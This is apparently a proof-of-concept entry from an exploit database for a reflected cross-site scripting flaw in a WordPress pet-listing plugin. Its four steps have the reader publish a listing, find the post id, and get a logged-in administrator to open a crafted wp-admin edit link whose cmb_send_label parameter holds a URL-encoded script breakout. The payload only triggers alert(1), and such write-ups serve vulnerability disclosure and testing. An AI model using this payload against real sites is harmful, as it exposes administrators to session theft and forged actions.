## https://sploitus.com/exploit?id=WPEX-ID:88162016-9FC7-4194-9E81-44C50991F6E9
1. Add a pet and publish the listing
2. View the pet on the frontend of the site and get a valid post id (found on the `<body>` element as a class (i.e. `postid-9`)
3. Make a logged in admin open a link: `https://example.com/wp-admin/post.php?post=__POST_ID__HERE__&action=edit&cmb_force_send=true&cmb_send_label=test%27%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E`
4. See the XSS